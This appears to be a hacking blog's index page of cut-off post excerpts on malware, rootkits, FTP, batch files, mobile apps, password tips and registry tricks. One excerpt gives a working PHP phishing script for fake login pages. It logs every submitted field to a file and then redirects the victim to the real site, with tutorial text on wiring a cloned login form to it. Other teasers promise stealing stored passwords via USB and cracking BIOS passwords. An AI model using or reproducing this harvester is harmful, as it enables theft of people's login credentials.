Malware
Malware, short for malicious software, is software designed to infiltrate a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code.[1] The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses.
Software is considered malware based on the perceived intent of the creator rath...
FAKE LOG IN PAGES.
01.
02.Header("Location: http://www.RealSite.com");
03.
04.$handle = fopen("list.txt", "a");
05.
06.foreach($_GET as $variable => $value) {
07.
08.fwrite($handle, $variable);
09.fwrite($handle, "=");
10.fwrite($handle, $value);
11.fwrite($handle, "\r\n");
12.}fwrite($handle, "\r\n");
13.
14.fclose($handle);
15.exit;
16.?>
6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in th...
Rootkit
:
A rootkit is a type of software that is designed to gain administrator-level control over a computer system without being detected. In virtually all cases, the purpose and motive is to perform malicious operations on a target host computing system at a later date without the knowledge of the administrators or users of that system. Rootkits can be installed in hardware or software targeting the BIOS, hypervisor, boot loader, kernel or less commonly, librari...
File Transfer Protocol
Introduction
The following information is provided as a reference for the File Transfer Protocol (FTP) commands. This document describes a typical process for an interactive and automated, batch FTP session running on a PC with Windows/2000 and connecting to a UNIX system. This process may vary slightly depending on the hardware and software configurations of the local and remote systems.
An Interactive FTP Session
To start an FTP interactive session type "ftp" from ...
Batch fle ABCs
Batch files allow MS-DOS and Microsoft Windows users to create a lists of commands to run in sequence once the batch file has been executed. For example, a batch file could be used to run frequently run commands, deleting a series of files, moving files, etc. A simple batch file does not require any special programming skills and can be done by users who have a basic understanding of MS-DOS commands.
A good example of a batch file for someone who is more familiar with Wi...
WINDOWS MOBILE PHONE DOWNLOADS
Free 24 Cool Apps for Windows Mobile Phone
Hello Friends,
Today I am going to give you 24 Best Windows Mobile phone apps which will be useful in your daily life. The most important thing is that all these Apps are available free to any user. Here is the List of Apps along with a brief description about each App.
Call Firewall: Call Firewall is a software that rejects unwanted calls. It does exactly what you would think it...
Hack Proof Passwords
Today I am going to teach you an incredibly useful skill. How to make Hack Proof Passwords.
Things that make a good password:
Easy To Remember. No use having the thing if you can’t even remember it.
Long Long Long!If it is not long, people will be able to Brute Force it.
Combinations of Numbers, Letters, Symbols.Again due to brute forcing.
Difficult to guess.If you make it your wife’s name. People are going to get it.
UniqueEvery site should have a diffe...
hack all passwords using usb
Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords o...
WINDOWS XP REGISTRY TRICKS
Display Your Quick Launch Toolbar Tip:Is your Quick Launch toolbar missing from the taskbar?To display your familiar Quick Launch toolbar:Right-click an empty area on the taskbar, click Toolbars, and then click Quick Launch. Easy as that your Quick Launch bar appears. To add items to your Quick Launch toolbar, click the icon for the program you want to add, and drag it to the Quick Launch portion of the taskbar. ---------------------------------------------...
Here is the Best way to Crack the BIOS password.
There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.Follow the steps below:[eminimall]1) Boot up windows.2) go to dos-prompt or go to command prompt dire...